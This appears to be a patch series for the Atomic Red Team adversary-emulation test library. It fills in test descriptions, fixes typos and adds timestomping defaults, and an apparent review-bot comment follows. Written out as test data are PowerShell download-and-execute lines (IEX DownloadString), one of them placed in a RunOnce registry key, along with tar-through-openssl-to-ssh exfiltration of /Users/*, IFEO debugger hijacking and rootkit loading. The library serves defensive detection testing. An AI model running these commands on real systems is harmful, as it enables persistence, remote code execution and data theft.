GetObject [windows] - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -304,7 +303,7 @@ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - [T1160 Launch Daemon](./T1160/T1160.md) - Atomic Test #1: Launch Daemon [macos] - [T1050 New Service](./T1050/T1050.md) @@ -557,7 +556,7 @@ - [T1076 Remote Desktop Protocol](./T1076/T1076.md) - Atomic Test #1: RDP [windows] - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -638,7 +637,7 @@ - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 1674ea9c..05d74bf6 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -1125,7 +1125,7 @@ persistence: mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file - name: Mac Hidden file - description: 'TODO + description: 'Hide a file on MacOS ' supported_platforms: 
@@ -1158,29 +1158,39 @@ persistence: ' - name: Hidden files - description: 'Requieres Apple Dev Tools + description: 'Requires Apple Dev Tools ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'setfile -a V #(unknown) ' - name: Hide a Directory - description: 'xxx + description: 'Hide a directory on MacOS ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'chflags hidden #(unknown) ' - name: Show all hidden files - description: 'xxx + description: 'Show all hidden files on MacOS ' supported_platforms: @@ -1190,8 +1200,8 @@ persistence: command: 'defaults write com.apple.finder AppleShowAllFiles YES ' - - name: Create visible Directories - description: 'xxx + - name: Create Visible Directories + description: 'Create visible directories on MacOS and Linux ' supported_platforms: @@ -1205,7 +1215,7 @@ persistence: ls ls visible-directory - name: Create hidden directories and files - description: 'xxx + description: 'Create hidden directories and files on Nix platforms ' supported_platforms: @@ -1550,7 +1560,7 @@ persistence: identifier: T1183 atomic_tests: - name: IFEO Add Debugger - description: 'TODO + description: 'Leverage Global Flags Settings ' supported_platforms: @@ -1570,7 +1580,7 @@ persistence: File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ' - - name: IFEO GLobal Flags + - name: IFEO Global Flags description: 'Leverage Global Flags Settings ' @@ -1780,7 +1790,7 @@ persistence: identifier: T1160 atomic_tests: - name: Launch Daemon - description: 'TODO + description: 'Utilize LaunchDaemon to launch `Hello World` ' supported_platforms: @@ -1963,7 +1973,7 @@ persistence: identifier: T1168 atomic_tests: - name: Cron Job - description: 'TODO + description: 'Set a cron job ' supported_platforms: 
@@ -1982,7 +1992,7 @@ persistence: ' - name: Cron Job - description: 'TODO + description: 'Manually set a cron job ' supported_platforms: @@ -2595,7 +2605,7 @@ persistence: identifier: T1150 atomic_tests: - name: Plist Modification - description: 'TODO + description: 'Modify MacOS plist file in one of two directories ' supported_platforms: @@ -2839,7 +2849,7 @@ persistence: name: powershell command: | $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force - name: Startup Folder description: 'Add Shortcut To Startup via PowerShell @@ -4238,11 +4248,6 @@ defense-evasion: [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html) supported_platforms: - windows - input_arguments: - output_file: - description: TODO - type: todo - default: TODO executor: name: manual steps: | @@ -4983,7 +4988,7 @@ defense-evasion: mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file - name: Mac Hidden file - description: 'TODO + description: 'Hide a file on MacOS ' supported_platforms: 
@@ -5016,29 +5021,39 @@ defense-evasion: ' - name: Hidden files - description: 'Requieres Apple Dev Tools + description: 'Requires Apple Dev Tools ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'setfile -a V #(unknown) ' - name: Hide a Directory - description: 'xxx + description: 'Hide a directory on MacOS ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'chflags hidden #(unknown) ' - name: Show all hidden files - description: 'xxx + description: 'Show all hidden files on MacOS ' supported_platforms: @@ -5048,8 +5063,8 @@ defense-evasion: command: 'defaults write com.apple.finder AppleShowAllFiles YES ' - - name: Create visible Directories - description: 'xxx + - name: Create Visible Directories + description: 'Create visible directories on MacOS and Linux ' supported_platforms: @@ -5063,7 +5078,7 @@ defense-evasion: ls ls visible-directory - name: Create hidden directories and files - description: 'xxx + description: 'Create hidden directories and files on Nix platforms ' supported_platforms: @@ -5250,7 +5265,7 @@ defense-evasion: identifier: T1183 atomic_tests: - name: IFEO Add Debugger - description: 'TODO + description: 'Leverage Global Flags Settings ' supported_platforms: @@ -5270,7 +5285,7 @@ defense-evasion: File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ' - - name: IFEO GLobal Flags + - name: IFEO Global Flags description: 'Leverage Global Flags Settings ' @@ -6491,7 +6506,7 @@ defense-evasion: identifier: T1150 atomic_tests: - name: Plist Modification - description: 'TODO + description: 'Modify MacOS plist file in one of two directories ' supported_platforms: 
@@ -7040,17 +7055,6 @@ defense-evasion: name: sh command: 'sudo modprobe #{rootkit_file} -' - - name: LD_PRELOAD based Rootkit - description: 'LD_PRELOAD based Rootkit - -' - supported_platforms: - - linux - executor: - name: sh - command: 'export LD_PRELOAD=$PWD/#{rootkit_file} - ' - name: Windows Signed Driver Rootkit Test description: | @@ -8612,7 +8616,7 @@ privilege-escalation: identifier: T1183 atomic_tests: - name: IFEO Add Debugger - description: 'TODO + description: 'Leverage Global Flags Settings ' supported_platforms: @@ -8632,7 +8636,7 @@ privilege-escalation: File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ' - - name: IFEO GLobal Flags + - name: IFEO Global Flags description: 'Leverage Global Flags Settings ' @@ -8725,7 +8729,7 @@ privilege-escalation: identifier: T1160 atomic_tests: - name: Launch Daemon - description: 'TODO + description: 'Utilize LaunchDaemon to launch `Hello World` ' supported_platforms: @@ -8926,7 +8930,7 @@ privilege-escalation: identifier: T1150 atomic_tests: - name: Plist Modification - description: 'TODO + description: 'Modify MacOS plist file in one of two directories ' supported_platforms: @@ -13321,7 +13325,7 @@ execution: identifier: T1168 atomic_tests: - name: Cron Job - description: 'TODO + description: 'Set a cron job ' supported_platforms: @@ -13340,7 +13344,7 @@ execution: ' - name: Cron Job - description: 'TODO + description: 'Manually set a cron job ' supported_platforms: @@ -15610,8 +15614,8 @@ lateral-movement: type: attack-pattern identifier: T1105 atomic_tests: - - name: xxxx - description: 'xxxx + - name: rsync - scp - sftp remote file copy + description: 'Utilize rsync, scp and sftp to perform a remote file copy ' supported_platforms: 
@@ -15620,7 +15624,7 @@ lateral-movement: executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + ### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account @@ -16212,7 +16216,7 @@ collection: - windows executor: name: powershell - command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat'')" + command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')" > c:\windows\pi.log ' @@ -16547,9 +16551,8 @@ exfiltration: identifier: T1002 atomic_tests: - name: Compress Data for Exfiltration With PowerShell - description: 'TODO - -' + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration \n" supported_platforms: - windows input_arguments: @@ -16567,9 +16570,8 @@ exfiltration: ' - name: Compress Data for Exfiltration With Rar - description: 'TODO - -' + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration \n" supported_platforms: - windows input_arguments: @@ -16587,9 +16589,8 @@ exfiltration: ' - name: Data Compressed - nix - description: 'TODO - -' + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration \n" supported_platforms: - linux - macos @@ -16667,7 +16668,7 @@ exfiltration: identifier: T1022 atomic_tests: - name: Data Encrypted - description: 'TODO + description: 'Encrypt data for exiltration ' supported_platforms: @@ -16738,11 +16739,6 @@ exfiltration: - centos - ubuntu - linux - input_arguments: - output_file: - description: TODO - type: todo - default: TODO executor: name: sh command: | 
@@ -16833,6 +16829,19 @@ exfiltration: - centos - ubuntu - linux + input_arguments: + domain: + description: target SSH domain + type: url + default: target.example.com + user_name: + description: username for domain + type: string + default: atomic + password: + description: password for user + type: string + default: atomic executor: name: sh command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh @@ -17066,8 +17075,8 @@ command-and-control: type: attack-pattern identifier: T1105 atomic_tests: - - name: xxxx - description: 'xxxx + - name: rsync - scp - sftp remote file copy + description: 'Utilize rsync, scp and sftp to perform a remote file copy ' supported_platforms: @@ -17076,7 +17085,7 @@ command-and-control: executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + ### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account diff --git a/atomics/linux-index.md b/atomics/linux-index.md index e7af431d..e9f45e4d 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -12,7 +12,7 @@ - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1168 Local Job Scheduling](./T1168/T1168.md) 
@@ -67,7 +67,7 @@ - T1017 Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -146,7 +146,7 @@ - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) @@ -163,7 +163,6 @@ - [T1014 Rootkit](./T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] - Atomic Test #2: Loadable Kernel Module based Rootkit [linux] - - Atomic Test #3: LD_PRELOAD based Rootkit [linux] - [T1064 Scripting](./T1064/T1064.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - [T1151 Space after Filename](./T1151/T1151.md) 
@@ -211,7 +210,7 @@ - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index a5c212f9..2552ce47 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -16,7 +16,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -120,7 +120,7 @@ - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #2: Logon Scripts - Mac [macos] - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -206,7 +206,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1147 Hidden Users](./T1147/T1147.md) - Atomic Test #1: Hidden Users [macos] @@ -252,7 +252,7 @@ - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a767df04..905fd045 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -43,7 +43,7 @@ - Atomic Test #10: Create ADS PowerShell [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) 
@@ -84,7 +84,7 @@ - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] - Atomic Test #3: Regsvr32 local DLL execution [windows] - [T1014 Rootkit](./T1014/T1014.md) - - Atomic Test #4: Windows Signed Driver Rootkit Test [windows] + - Atomic Test #3: Windows Signed Driver Rootkit Test [windows] - [T1085 Rundll32](./T1085/T1085.md) - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -127,7 +127,7 @@ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - [T1050 New Service](./T1050/T1050.md) - Atomic Test #1: Service Installation [windows] - Atomic Test #2: Service Installation PowerShell Installs A Local Service using PowerShell [windows] @@ -188,7 +188,7 @@ - Atomic Test #1: Installing Hyper-V Feature [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #1: Logon Scripts [windows] From 22d5574c10d6d89cb3b553bc6e7bb89ad833f109 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Fri, 2 Nov 2018 15:10:44 -0600 Subject: [PATCH 5/5] Fixed T1099 (#399) * Fixed T1099 fixed T1099 input args * Generate docs from job=validate_atomics_generate_docs branch=T1099-2 --- atomics/T1099/T1099.md | 6 +++--- atomics/T1099/T1099.yaml | 3 +++ atomics/index.yaml | 3 +++ 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md index e314000d..d05ffa3a 100644 
--- a/atomics/T1099/T1099.md +++ b/atomics/T1099/T1099.md @@ -32,7 +32,7 @@ Stomps on the access timestamp of a file #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_filename | Path of file that we are going to stomp on last access time | Path | | +| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| #### Run it with `sh`! ``` @@ -50,7 +50,7 @@ Stomps on the modification timestamp of a file #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_filename | Path of file that we are going to stomp on last access time | Path | | +| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| #### Run it with `sh`! ``` @@ -71,7 +71,7 @@ Sudo or root privileges are required to change date. Use with caution. #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_filename | Path of file that we are going to stomp on last access time | Path | | +| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| #### Run it with `sh`! ``` diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml index b2905803..9ecc5331 100644 --- a/atomics/T1099/T1099.yaml +++ b/atomics/T1099/T1099.yaml @@ -13,6 +13,7 @@ atomic_tests: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: /opt/filename executor: name: sh command: | @@ -28,6 +29,7 @@ atomic_tests: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: /opt/filename executor: name: sh command: | @@ -47,6 +49,7 @@ atomic_tests: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: /opt/filename executor: name: sh command: | 
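Review bot: The new `default: /opt/filename` added in all three T1099.yaml hunks points into a directory that is normally root-owned, so the `touch -a -t …` / `touch -m -t …` commands that consume `#{target_filename}` (visible in the generated index for the same tests) will most likely fail with a permission error when the atomic is run unprivileged, and on a root run they leave a stray file under /opt. Other defaults on this page use a temporary path (`"/tmp/evil"`), so something like `default: /tmp/T1099_target` (constructed value) would let the tests run without privileges and be trivial to clean up. The enclosing test entries start outside each hunk and the `command: |` block continues past them, so the command lines themselves are not under review here. While here, the second hunk's input argument still describes "last access time" although that test stomps the modification timestamp; `description: Path of file whose modification time will be stomped` would match what the command does.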
diff --git a/atomics/index.yaml b/atomics/index.yaml index 05d74bf6..cfd8b96f 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -7450,6 +7450,7 @@ defense-evasion: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: "/opt/filename" executor: name: sh command: 'touch -a -t 197001010000.00 #{target_filename} @@ -7466,6 +7467,7 @@ defense-evasion: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: "/opt/filename" executor: name: sh command: 'touch -m -t 197001010000.00 #{target_filename} @@ -7484,6 +7486,7 @@ defense-evasion: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: "/opt/filename" executor: name: sh command: |